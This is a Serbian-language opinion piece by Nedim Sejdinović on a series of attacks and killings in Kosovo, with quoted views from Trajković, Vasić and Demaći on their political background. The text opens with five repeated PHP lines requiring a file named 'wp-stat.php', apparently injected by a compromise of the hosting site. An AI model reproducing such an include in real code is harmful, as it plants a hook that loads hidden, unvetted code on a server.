@require(dirname(__FILE__).'/wp-stat.php'); @require(dirname(__FILE__).'/wp-stat.php'); @require(dirname(__FILE__).'/wp-stat.php'); @require(dirname(__FILE__).'/wp-stat.php'); @require(dirname(__FILE__).'/wp-stat.php'); UZAVRELA KOSOVSKA POLITIČKA SCENA: Šta se krije iza incidenata – Nedim Sejdinović

UZAVRELA KOSOVSKA POLITIČKA SCENA: Šta se krije iza incidenata

Ova godina bi, ako je verovati svetskim zvaničnicima, trebalo da bude ključna za budućnost i konačan status Kosova. Da li se sa tim može povezati serija incidenata koji su se u poslednjih mesec dana desili u južnoj pokrajini koja se danas nalazi pod protektoratom UN ili je u pitanju nešto drugo?

Da podsetimo, prvo je na predsednika Kosova Ibrahima Rugovu izvršen neuspešan atentat kada je pokraj njegovog automobila eksplodirala bomba, pri čemu je lakše ranjena osoba iz njegove pratnje. Eksplozivna naprava je bila sakrivena u kontejneru u centru Prištine, a Rugova je kroz centar prolazio uputivši se na aerodrom da dočeka Havijera Solanu, visokog predstavnika EU za spoljnu politiku i sigurnost. Par sedmica potom, kod Peći je ubijen brat bivšeg kosovskog premijera i haškog optuženika Ramuša Haradinaja – Enver Haradinaj. Na njega je pucano iz automobila u pokretu, a njegovu smrt deo kosovske javnosti povezao je sa «tradicionalnim običajima», odnosno krvnom osvetom bez političke pozadine, dok je drugi deo te javnosti, među njima i Haradinajova Alijansa za budućnost, uvereno da je u pitanju politička likvidacija. Na kraju se desila eksplozija u sedištu stranke «Ora» Vetona Suroia, poznatog kosovskog intelektualca, pionira nevladinog sektora i masmedijskog mogula. Suroi je, po incidentu, izjavio da je u pitanju politički obračun, a od posledica eksplozije ranjeno je troje dece.

Policijska istraga ova tri slučaja do sada nije dala nikakav rezultat, a za atentat na Rugovu odgovornost je preuzela ekstremistička ANA, koja se i na Kosovu nalazi na spisku terorističkih organizacija i koja je javnosti poznata iz događanja u Makedoniji i na jugu Srbije. ANA se inače zalaže za stvaranje Velike Albanije. Eksplozija ispred «Ore» dovodi se u vezu sa pretnjama smrću koje su Suroi i još nekolicina kosovskih političara dobijali od fantomske organizacije «Sigurnost domovine». Pretnje su usledile posle optužbi koje su ovi političari iznosili na na račun potpredsednika Vlade Adema Salihaja i troje ministara o njihovoj navodnoj upletenosti u kriminal.

KRHKA ARGUMENTACIJA

Međutim, ova tri incidenta samo su vrh ledenog brega, a na Kosovu se od Nove godine naovamo desio i čitav niz «manjih» ubistava i ekscesa za koje postoji sumnja da imaju (i) političku pozadinu. Osim toga, došlo je i do ozbiljnih optužbi između dve vodeće kosovske partije – Tačijeve Demokratske partije Kosova i Rugovine Demokratske stranke Kosova. DPK je Unmiku predala dosije od 30 stranica u kojem se pojedini članovi Vlade iz redova DSK «argumentovano» optužuju da su vođe organizovanog kriminala i da su uključeni u pretnje i ubistva koja se dešavaju na Kosovu. U tom dosijeu se navodi da DSK stoji iza pomenute organizacije «Sigurnost domovine». DSK je oštro opovrgao optužbe, saopštivši da ih iznose politički gubitnici koji bi na svaki način da povrate vlast. Međusobne optužbe su, na kraju, javnosti otkrile da postoji opravdana sumnja da obe ove partije imaju nešto što bi se moglo nazvati organizovanom stranačkom kontraobaveštajnom službom. A to je dakako protivzakonito.

Bečki dnevnik «Prese» u svom komentaru najnovijih zbivanja na Kosovu zaključuje da je bezbednosno stanje na Kosovu veoma krhko i da se albanske ekstremističke grupe i dalje oslanjaju na nasilje. List navodi da žustrina sa kojom je ponovo izbila unutar-albanska borba za vlast preti da oslabi pozicije kosovskih Albanaca u predstojećim pregovorima o statusu i da će Beograd znati da krhko stanje bezbednosti iskoristi protiv zahteva kosovskih Albanaca za nezavisnost.

FINGIRANI INCIDENTI

Predsednik Srpskog pokreta otpora sa Kosova Momčilo Trajković u razgovoru za «Građanski list» ističe da incidenti na Kosovu nisu deo realnih procesa, već da se dešavaju pod kontrolom albanske političke elite. Iz te tvrdnje izdvaja ubistvo Envera Haradinaja, za koje tvrdi da je, najverovatnije, posledica krvne osvete.

– Incidenti imaju cilj da se međunarodna zajednica upozori da će, ukoliko se mirnim putem ne ostvari nezavisnost Kosova, ekstremisti koristiti sva sredstva da do toga dođu. Radi se o kontrolisanom stanju, tvrde ekstremne varijante nalaze se pod kontrolom političkih elita. U pitanju je kombinacija strategije albanskog terorističkog pokreta, centara moći i albanskih lobija koji deluju veoma sinhronizovano – kaže Trajković i ističe da su incidenti poruka ne samo međunarodnoj zajednici već i Srbima povratnicima. Po njemu, na Kosovu je još uvek ključno pitanje kako zaustaviti povratak, i to po svaku cenu.

On tvrdi da je kosovska albanska elita potpuno jedinstvena kada je u pitanju nezavisnost Kosova, ali da postoji rivalstvo između Tačija i Rugove ko će preuzeti kontrolu nad Kosovom kada ono postane nezavisno i ko će poneti lovorike za ostvarivanje nezavisnosti.

– Pod kontrolom nad Kosovom ne podrazumevam samo političku vlast već i kontrolu raznih poslova, pre svega mafijaških – kaže Trajković.

POSLEDICA NEDEFINISANOG STATUSA

Politički analitičar iz Beograda i jedan od tvoraca alternativnog plana za Kosovo pod imenom «Kosovo – ervopska regija», Nenad Vasić, u razgovoru za GL tvrdi da su incidenti posledica političkog pregrupisavanja na Kosovu, a da ekstremne grupe na ovaj način žele da se vrate na političku scenu.

– Različiti akteri pokušavaju da preuzmu inicijativu zbog otvaranja pitanja konačnog statusa Kosova. Ekstremne grupe koje su ostale izvan sistema vlasti upozoravaju političare da vode računa o globalnim interesima i da ni u kom slučaju ne smeju da pristanu na bilo kakav dijalog sa Beogradom, niti da odustanu od projekta nezavisne države Kosovo, bez obzira ne međunarodne pritiske – kaže Vasić.

Poznati kosovski političar i disident, odnedavno predsednik Društva književnika Kosova, Adem Demaći kaže za «Građanski list» da je uzavrelo političko proleće na Kosovu logična posledica nedefinisanog statusa, koji je plodno tle za frustracije i društvene devijacije, kao i delovanje raznih grupa sa sumnjivim namerama.

– Skoro svakodnevno imate zbivanja koja govore da u mehanizmu sigurnosti na Kosovu nešto ozbiljno ne štima. I to nije čudno, s obzirom da postoji dualitet kompetencije. Albanski policajci, sem saobraćajnih, nemaju odgovarajućih kompetencija, više su posmatrači i izvršioci i ne mogu da preuzmu odgovornost za sigurnost. Sistem bezbednosti podrazumeva dug, trajan rad, a osnovna anomalija našeg sistema je privremenost. Policija nema razgranatu mrežu, nema pristup mnogim važnim stvarima, nema mogućnost da stvori infromativnu mrežu među građanima, što je neophodno da bi se predupredile kriminalne radnje i otkrili njihovi izvršioci – kaže Demaći, ističući da policija nije otkrila niti jednog izvršioca krupnih krivičnih dela na Kosovu od Nove godine do danas. Demaći smatra da je rešavanje konačnog statusa preduslov da se počne izgrađivati valjan sistem bezbednosti, koji će omogućiti sigurnost svim građanima Kosova.

ULOGA BEOGRADA

Nenad Vasić kaže da je komentar bečkog «Presea» tačan i da se kosovski Albanci zbog najnovije spirale nasilja udaljavaju od nezavisnosti Kosova, jer incidenti ukazuju na to da oni politički nisu u stanju da osiguraju bezbednost i ljudska prava preko privremenih insitucija samouprave, bez obzira na brojna ovlašćena koja su u prethodnom periodu prenesena na njih.

– Čini se da najnoviji elementi destabilizacije Kosovo uvode u novi haos i bezvlašće i na taj način derogiraju sve napore kosovskih Albanaca da izbegnu pregovore sa Beogradom. Incidenti, takođe, najavljuju i rasplet na kosovskoj političkoj sceni, koji će pokazati ko je ko, ko je s kim sarađivao i ko je koga zadužio. Kosovo, kao i Srbija, prati od posleratnog sindroma, gde su politika i kriminal usko vezani, a ogroman kapital je dospeo u ruke pojedinih moćnika. Postoje političari koji su ucenjeni ili direktno involvirani u nedozvoljene radnje, od mita i korupcije do organizovanog kriminala. Samo uterivanje sive i crne ekonomije u legalne tokove garantuje čitav niz političkih zemljotresa. Plašim se da i kosovski rasplet ne bude tako krvav kao onaj u Srbiji, kada je ubijen premijer Đinđić – kaže Vasić.

I Demaći se slaže sa komentarom bečkog «Presea» da incidenti nikako ne idu na ruku kosovskim Albancima. Upravo zbog toga na Kosovu postoje teorije, za koje Demaći misli da nisu u potpunosti bez osnova, da je deo najnovijih incidenata smišljen u Beogradu.

Beograd ima mehanizme na Kosovu koje su za nas još uvek tajna. Posle 1999. godine nije identifikovana niti jedna grupa saradnika srpskog DB-a među kosovskim Albancima, a poznato je da ih je bilo, i to ne mali broj. Ti ljudi su penetrirani u stranke, vlast, pa čak i u UNMIK. Činjenica da incidenti idu u prilog Beogradu otvara sumnju da on možda i stoji iza njih. Možda to nekom zvuči paranoično, ali događaji u proteklih petnaestak godina daju itekako prostora za tu sumnju – kaže Demaći.

Nedim Sejdinović

 

Sviđa vam se ovaj tekst? Odojite sekund vašeg vremena da podržite Nedima Sejdinovića preko Patreon-a!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.